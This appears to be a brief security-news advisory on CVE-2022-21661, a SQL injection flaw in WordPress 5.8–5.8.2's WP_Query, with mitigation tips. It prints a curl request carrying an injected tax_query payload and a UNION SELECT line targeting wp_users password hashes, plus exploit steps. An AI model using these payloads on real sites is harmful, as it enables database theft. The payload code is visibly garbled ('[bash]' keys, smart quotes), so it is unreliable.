Listen to this Post
How the mentioned CVE works
The CVE-2022-21661 vulnerability exists within the WordPress WP_Query class. A flaw in the sanitization of the ‘terms’ parameter used for taxonomy queries allows an attacker to inject malicious SQL clauses. Specifically, when querying for posts based on multiple taxonomies, the input passed to the ‘terms’ parameter is not properly escaped before being used to build a SQL query. This enables an unauthenticated attacker to append additional, arbitrary SQL commands to the main query. By exploiting this weakness, the attacker can leak sensitive data from the WordPress database, including password hashes and other user information, directly from the frontend of the website without needing any authentication.
Platform: WordPress
Version: 5.8 to 5.8.2
Vulnerability : SQL Injection
Severity: Critical
date: 2022-01-10
Prediction: Patch Available
What Undercode Say:
`curl -s “http://vulnerable-site.com/?cat=1)” –data ‘tax_query[bash][taxonomy]=cat&tax_query[bash][field]=term_id&tax_query[bash][terms]=1) OR 1=1– -‘`
`wpdb::prepare( “SELECT … WHERE $where $orderby $limits” );`
`UNION SELECT user_login, user_pass FROM wp_users–`
How Exploit:
Craft malicious HTTP request.
Append UNION SELECT statements.
Exfiltrate database contents.
Protection from this CVE
Update WordPress immediately.
Apply vendor security patch.
Use Web Application Firewall.
Impact:
Unauthenticated Data Disclosure.
Password Hash Extraction.
Complete Database Compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
